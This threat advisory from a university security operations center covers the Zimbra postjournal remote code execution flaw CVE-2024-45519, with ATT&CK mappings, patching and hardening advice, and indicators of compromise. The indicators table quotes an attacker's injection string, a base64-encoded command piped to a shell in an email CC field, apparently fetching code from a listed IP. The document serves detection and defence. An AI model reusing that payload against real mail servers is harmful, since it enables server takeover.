I. Targeted Entities
-
Small to Medium Government and Business Entities
II. Introduction
A critical remote code execution (RCE) vulnerability, tracked as CVE-2024-45519, has been discovered in Zimbra email servers, posing a significant threat to organizations relying on the platform. The vulnerability resides in Zimbra’s postjournal service, which processes incoming emails over SMTP. This vulnerability allows attackers to compromise servers by sending specially crafted emails that trigger arbitrary command execution through the server’s CC field. Once exploited, the vulnerability can be used to install web shells, providing attackers full access to the compromised server and enabling further network infiltration.
III. Additional Background Information
Zimbra Collaboration, a widely used cloud-hosted platform for email and communication services, has become a prime target for cyberattacks due to its prevalence in corporate and government environments. In September 2024, a critical vulnerability, CVE-2024-45519, was uncovered in Zimbra’s postjournal service. This flaw, caused by improper input validation, allows remote attackers to execute arbitrary commands without authentication. The vulnerability has gained increased attention following the release of a proof-of-concept (PoC) exploit, significantly raising the risk of widespread exploitation. Given Zimbra’s importance across various sectors, the exposure of this vulnerability poses a serious threat to affected systems, making it a key concern in the current cybersecurity landscape.
IV. MITRE ATT&CK
- T1190 – Exploit Public-Facing Application
- The attackers exploit a vulnerability in the Zimbra Collaboration Suite, a public-facing application, by sending specially crafted emails that trigger command execution on the server.
- T1505.003 – Server Software Component: Web Shell
- The attackers create a web shell on the compromised server by concatenating base64-encoded commands from the CC field of the emails, allowing persistent remote access.
- T1059.004 – Command and Scripting Interpreter: Unix Shell
- The attackers execute shell commands on the server by exploiting the input validation flaw, enabling them to control the system via the web shell.
- T1071.001 – Application Layer Protocol: Web Protocols
- The attackers use HTTP requests with specially crafted cookies (JSESSIONID and JACTION) to communicate with the web shell, establishing a command-and-control channel.
- T1105 – Ingress Tool Transfer
- Through the web shell, the attackers download and execute additional malicious code or files onto the compromised server.
- T1132.001 – Data Encoding: Standard Encoding
- The attackers use base64 encoding to encode malicious commands and payloads within the email CC fields and cookies to obfuscate the data and evade detection.
- T1036.005 – Masquerading: Match Legitimate Name or Location
- The attackers send spoofed emails that appear to come from Gmail, leveraging trusted sources to bypass initial security checks.
V. Recommendations
- Patch Management
- Ensure that all Zimbra email server installations, including Zimbra 9.0.0 Patch-41, Zimbra 10.0.9, and Zimbra 10.1.1 (Daffodil), are updated with the latest patches addressing CVE-2024-45519. Systems still running Zimbra 8.8.15, which has received a one-time patch past its EOL, should be prioritized for patching. Regularly monitor for new security updates and apply them as soon as they are released.
- Monitoring and Logging
- Implement comprehensive monitoring and logging to detect suspicious activities targeting the Zimbra postjournal service. Focus on identifying unusual email patterns, base64-encoded commands, or abnormal execution of commands through the postjournal service. Regular log reviews can help catch early signs of exploitation.
- Access Control
- Properly configure Zimbra’s “mynetworks” parameter to restrict access to trusted IP ranges only. If the postjournal service is not required for your organization’s operations, consider disabling it to reduce the attack surface, especially in environments where patching may be delayed
- Service Management
- Ensure that optional services like postjournal, which is not enabled by default, remain disabled unless explicitly needed. On systems where postjournal is unnecessary, consider removing or disabling it entirely to minimize potential vulnerabilities.
- Vendor Communication
-
Establish regular communication with Zimbra to stay informed about the latest security advisories, patches, and best practices. Regularly check the Zimbra Security Center and set up notifications to receive updates on new vulnerabilities and security patches promptly.
-
VI. IOCs (Indicators of Compromise)
Type | Indicator |
---|---|
IP Address |
79.124.49[.]86 |
Port |
10027 |
Base64-encoded String |
ppp’echo${IFS} Li4vLj4vY29tbW9uL2Jpbi 9jdXJsIGh0dHA6LY830S 4xMjQuNDkuODY6NDQZL 3RwdnRnYmp3ZWV2dnV vbWJ5d2xrdGhsbGpkdXB 4Znlz|base64$(IFS)-di shipppppp@mail.com |
VII. References
Dark Reading. (October 1, 2024). Zimbra RCE Vuln Under Attack Needs Immediate Patching. https://www.darkreading.com/cyberattacks-data-breaches/recent-zimbra-rce-under-attack-patch-now
BleepingComputer. (October 2, 2023). Critical Zimbra RCE flaw exploited to backdoor servers using emails. https://www.bleepingcomputer.com/news/security/critical-zimbra-rce-flaw-exploited-to-backdoor-servers-using-emails/
SOCRadar. (October 02, 2024). RCE Vulnerability in Zimbra (CVE-2024-45519). https://socradar.io/rce-vulnerability-in-zimbra-cve-2024-45519/
Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Thiago Reis Pagliaroni, Benjamin Price